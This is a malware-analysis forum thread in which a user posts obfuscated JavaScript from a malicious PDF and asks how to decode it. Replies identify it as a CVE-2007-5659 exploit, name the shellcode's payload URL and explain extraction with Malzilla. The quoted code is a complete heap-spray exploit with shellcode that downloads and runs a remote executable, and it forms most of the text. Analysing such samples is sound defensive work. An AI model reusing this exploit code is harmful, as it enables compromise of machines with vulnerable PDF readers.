Malware Domain List

Malware Related => Malware Analysis => Topic started by: MADY on September 20, 2010, 11:16:10 am

Title: Please help
Post by: MADY on September 20, 2010, 11:16:10 am
Please some one tell me how to decode this code?


Quote
var mM6RItmK = new Array();



function yNYJ8yVD(HydurAUR, XbGQrcyY)

{

    while (HydurAUR.length*2<XbGQrcyY) {

        HydurAUR += HydurAUR;

    }



    HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);



    return HydurAUR;

}



function ooyS1YUR()

{

    var jKts_E9h = 0x0c0c0c0c;

    var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u612F%u6C6F%u6F63%u6E75%u6574%u2E72%u6F63%u2F6D%u6956%u4B57%u3736%u2F42%u7865%u2E65%u6870%u0070");

    var Y9Ib6uuE = 0x400000;

    var xxKaKDUU = i0a7eJNL.length * 2;

    var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);

    var HydurAUR = unescape("%u9090%u9090");



    HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);

    var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

   

    for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {

        mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;


    }

}


function RYiFEs8K()

{

    var XrCU20If = app.viewerVersion.toString();

    XrCU20If = XrCU20If.replace(/\D/g,'');





    var TPWRJTZJ = new Array(

        XrCU20If.charAt(0),

        XrCU20If.charAt(1),

        XrCU20If.charAt(2));





    if ((TPWRJTZJ[0] == 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||

        (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||

        (TPWRJTZJ[0] < 7)) {

        ooyS1YUR();

        var nabGR_dc = unescape("%u0c0c%u0c0c");

        while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;

        this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});

    }

}



RYiFEs8K();

Title: Re: Please help
Post by: SysAdMini on September 20, 2010, 11:24:06 am
This is a pdf exploit (CVE-2007-5659).

url in shellcode is http://aolcounter.com/ViWK67B/exe.php.

Domain aolcounter.com doesn't exist anymore.

http://www.malwaredomainlist.com/mdl.php?search=aolcounter&colsearch=All&quantity=50&inactive=on
Title: Re: Please help
Post by: MADY on September 20, 2010, 12:04:14 pm
Thanks for your reply,

Could you please explain me how do it manually to know about the URL of the shellcode. I have tried  malzilla to decode it, but it had given junk strings after executing the unescape sequence.

Please help me how to find out the URL from this code since i am going to give demonstration to our ppl regarding this.

Thanks in Advance,
MADY

Title: Re: Please help
Post by: GmG on September 20, 2010, 01:04:13 pm
malzilla -> misc decoders

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file


Title: Re: Please help
Post by: SysAdMini on September 20, 2010, 01:34:35 pm
malzilla -> misc decoders

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file

Instead of "Hex to file" I prefer to copy/paste content to "Hex view" tab.
In most cases you can see the url at the end of hex view.
If there is no url, then shellcode is probably xor encoded.
In this case you can enter "http" into field "Strings to find". Now click button "Find".
If Malzilla finds the encoded string "http", it displays xor key in field "Key".
Now click button "Apply xor" and you will see the url in hex viewer.
Title: Re: Please help
Post by: MADY on September 21, 2010, 07:47:17 am
Thanks a lot sysAdmini. you are the real HERO member for this MDL  :)